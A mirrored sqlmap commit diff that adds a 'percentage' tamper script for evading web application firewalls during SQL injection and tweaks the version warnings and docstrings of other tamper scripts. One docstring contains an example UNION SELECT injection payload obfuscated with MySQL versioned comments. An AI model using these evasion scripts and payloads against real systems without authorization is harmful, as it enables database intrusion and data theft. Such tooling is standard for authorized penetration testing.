mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 11:03:47 +03:00
Added one more tamper script from Roberto Salgado and minor adjustment to others
This commit is contained in:
parent
3985a81cb9
commit
05cb65b106
|
@ -17,7 +17,7 @@ from lib.core.enums import PRIORITY
|
|||
__priority__ = PRIORITY.HIGHEST
|
||||
|
||||
def dependencies():
|
||||
singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__)[:-3], DBMS.PGSQL))
|
||||
singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL))
|
||||
|
||||
def tamper(payload):
|
||||
"""
|
||||
|
|
|
@ -19,7 +19,7 @@ from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
|
|||
__priority__ = PRIORITY.HIGHER
|
||||
|
||||
def dependencies():
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.0" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
|
||||
|
||||
def tamper(payload):
|
||||
"""
|
||||
|
@ -30,10 +30,10 @@ def tamper(payload):
|
|||
* Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
|
||||
|
||||
Requirement:
|
||||
* MySQL < 5.0
|
||||
* MySQL < 5.1
|
||||
|
||||
Tested against:
|
||||
* MySQL 4.0.18
|
||||
* MySQL 4.0.18, 5.0.22
|
||||
|
||||
Notes:
|
||||
* Useful to bypass several web application firewalls when the
|
||||
|
|
56
tamper/percentage.py
Normal file
56
tamper/percentage.py
Normal file
|
@ -0,0 +1,56 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
$Id$
|
||||
|
||||
Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import os
|
||||
import string
|
||||
|
||||
from lib.core.enums import PRIORITY
|
||||
from lib.core.common import singleTimeWarnMessage
|
||||
|
||||
__priority__ = PRIORITY.LOW
|
||||
|
||||
def dependencies():
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP web applications" % os.path.basename(__file__).split(".")[0])
|
||||
|
||||
def tamper(payload):
|
||||
"""
|
||||
Adds a percentage sign ('%') infront of each character
|
||||
|
||||
Example:
|
||||
* Input: SELECT FIELD FROM TABLE
|
||||
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
|
||||
|
||||
Requirement:
|
||||
* ASP
|
||||
|
||||
Tested against:
|
||||
* Microsoft SQL Server 2000, 2005
|
||||
* MySQL 5.1.56, 5.5.11
|
||||
* PostgreSQL 9.0
|
||||
|
||||
Notes:
|
||||
* Useful to bypass weak and bespoke web application firewalls
|
||||
"""
|
||||
|
||||
if payload:
|
||||
retVal = ""
|
||||
i = 0
|
||||
|
||||
while i < len(payload):
|
||||
if payload[i] == '%' and (i < len(payload) - 2) and payload[i+1] in string.hexdigits and payload[i+2] in string.hexdigits:
|
||||
retVal += payload[i:i+3]
|
||||
i += 3
|
||||
elif payload[i] != ' ':
|
||||
retVal += '%%%s' % payload[i]
|
||||
i += 1
|
||||
else:
|
||||
retVal += payload[i]
|
||||
i += 1
|
||||
|
||||
return retVal
|
|
@ -17,7 +17,7 @@ from lib.core.enums import PRIORITY
|
|||
__priority__ = PRIORITY.LOW
|
||||
|
||||
def dependencies():
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
|
||||
|
||||
def tamper(payload):
|
||||
"""
|
||||
|
|
|
@ -21,7 +21,7 @@ from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
|
|||
__priority__ = PRIORITY.LOW
|
||||
|
||||
def dependencies():
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
|
||||
|
||||
def tamper(payload):
|
||||
"""
|
||||
|
@ -40,6 +40,8 @@ def tamper(payload):
|
|||
|
||||
Notes:
|
||||
* Useful to bypass several web application firewalls
|
||||
* Used during the ModSecurity SQL injection challenge,
|
||||
http://modsecurity.org/demo/challenge.html
|
||||
"""
|
||||
|
||||
def process(match):
|
||||
|
|
|
@ -18,7 +18,7 @@ from lib.core.enums import PRIORITY
|
|||
__priority__ = PRIORITY.LOW
|
||||
|
||||
def dependencies():
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
|
||||
|
||||
def tamper(payload):
|
||||
"""
|
||||
|
@ -37,6 +37,8 @@ def tamper(payload):
|
|||
|
||||
Notes:
|
||||
* Useful to bypass several web application firewalls
|
||||
* Used during the ModSecurity SQL injection challenge,
|
||||
http://modsecurity.org/demo/challenge.html
|
||||
"""
|
||||
|
||||
retVal = ""
|
||||
|
|
|
@ -18,7 +18,7 @@ from lib.core.enums import PRIORITY
|
|||
__priority__ = PRIORITY.HIGHER
|
||||
|
||||
def dependencies():
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
|
||||
|
||||
def tamper(payload):
|
||||
"""
|
||||
|
@ -32,9 +32,7 @@ def tamper(payload):
|
|||
* MySQL
|
||||
|
||||
Tested against:
|
||||
* MySQL 4.0.18
|
||||
* MySQL 5.1.56
|
||||
* MySQL 5.5.11
|
||||
* MySQL 4.0.18, 5.1.56, 5.5.11
|
||||
|
||||
Notes:
|
||||
* Useful to bypass several web application firewalls when the
|
||||
|
|
|
@ -19,7 +19,7 @@ from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
|
|||
__priority__ = PRIORITY.HIGHER
|
||||
|
||||
def dependencies():
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s >= 5.1.13" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
|
||||
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s >= 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
|
||||
|
||||
def tamper(payload):
|
||||
"""
|
||||
|
@ -33,8 +33,7 @@ def tamper(payload):
|
|||
* MySQL >= 5.1.13
|
||||
|
||||
Tested against:
|
||||
* MySQL 5.1.56
|
||||
* MySQL 5.5.11
|
||||
* MySQL 5.1.56, 5.5.11
|
||||
|
||||
Notes:
|
||||
* Useful to bypass several web application firewalls when the
|
||||
|
|
Loading…
Reference in New Issue
Block a user